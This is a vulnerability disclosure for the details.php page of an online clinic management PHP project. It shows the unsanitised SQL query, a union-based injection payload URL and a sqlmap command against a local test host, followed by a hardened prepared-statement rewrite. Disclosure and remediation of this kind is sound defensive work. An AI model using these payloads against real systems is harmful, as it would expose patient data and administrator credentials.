Details | |
---|---|
Vulnerability Type | Union Based SQL Injection |
Affected File | details.php |
Parameter | id |
Vendor | https://itsourcecode.com/ |
Product | Online Clinic Management System v1 |
Softlink | https://itsourcecode.com/free-projects/php-project/online-clinic-management-system-php-projects-source-code/ |

The Online Clinic Management System is vulnerable to union-based SQL injection in the details.php script. The `id` parameter is placed into a SQL query without sanitization, which lets attackers manipulate the query and exfiltrate sensitive data (e.g., administrative credentials), which can lead to complete system compromise.

```php
// $id (the id request parameter) is concatenated into the SQL string unescaped.
$query = "SELECT p.patient_id,p.fname,p.lname,p.patient_type,p.age,p.address FROM check_up c,patients p where c.patient_id=p.patient_id and c.check_id='".$id."'";
$result = mysqli_query($db, $query) or die (mysqli_error($db));
while ($row = mysqli_fetch_assoc($result)) {
    echo '<tr>';
    echo '<td>'. $row['patient_id'].'</td>';
    echo '<td>'. $row['fname'].'</td>';
    echo '<td>'. $row['lname'].'</td>';
    echo '<td>'. $row['patient_type'].'</td>';
    echo '<td>'. $row['age'].'</td>';
    echo '<td>'. $row['address'].'</td>';
    echo '</tr> ';
}
```

1. `http://localhost:8083/details.php?action=post&id=1005' and '1'='1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,database() -- -`
2. `sqlmap -u "http://localhost:8083/details.php?action=post&id=1005" --cookie="PHPSESSID=7d9f99c60c0296d8878b65b4aada0759" --level=5 --risk=3 --batch --dbs`
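
A hardened form of the details.php lookup, added here as an example and not taken from the vendor's code: the same query issued through a mysqli prepared statement, with input validation, HTML-encoded output, and SQL errors logged instead of echoed. It assumes `$db` is the application's open mysqli connection, that `check_id` values are numeric (as in `id=1005` above), and that the id arrives in the query string; the function name `render_checkup_rows` is hypothetical.

```php
<?php
// Added example, not the vendor's code. Assumptions: $db is an open mysqli
// connection, check_id is numeric, render_checkup_rows is a hypothetical name.

// Throw exceptions on SQL errors instead of printing them with die().
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function render_checkup_rows(mysqli $db, string $rawId): string
{
    // Reject anything that is not a plain decimal id before touching the database.
    if (!ctype_digit($rawId)) {
        http_response_code(400);
        return '';
    }

    // The id travels as a bound parameter, so quotes or UNION keywords in it
    // can never change the structure of the statement.
    $stmt = $db->prepare(
        'SELECT p.patient_id, p.fname, p.lname, p.patient_type, p.age, p.address
           FROM check_up c
           JOIN patients p ON c.patient_id = p.patient_id
          WHERE c.check_id = ?'
    );
    $stmt->bind_param('s', $rawId);
    $stmt->execute();
    $result = $stmt->get_result(); // requires the mysqlnd driver

    $columns = ['patient_id', 'fname', 'lname', 'patient_type', 'age', 'address'];
    $html = '';
    while ($row = $result->fetch_assoc()) {
        $html .= '<tr>';
        foreach ($columns as $col) {
            // Encode on output so stored values cannot inject markup.
            $html .= '<td>' . htmlspecialchars((string) $row[$col], ENT_QUOTES, 'UTF-8') . '</td>';
        }
        $html .= '</tr>';
    }
    $stmt->close();
    return $html;
}

try {
    echo render_checkup_rows($db, (string) ($_GET['id'] ?? ''));
} catch (mysqli_sql_exception $e) {
    // Keep database error text out of the response; log it server-side.
    error_log('details.php query failed: ' . $e->getMessage());
    http_response_code(500);
}
```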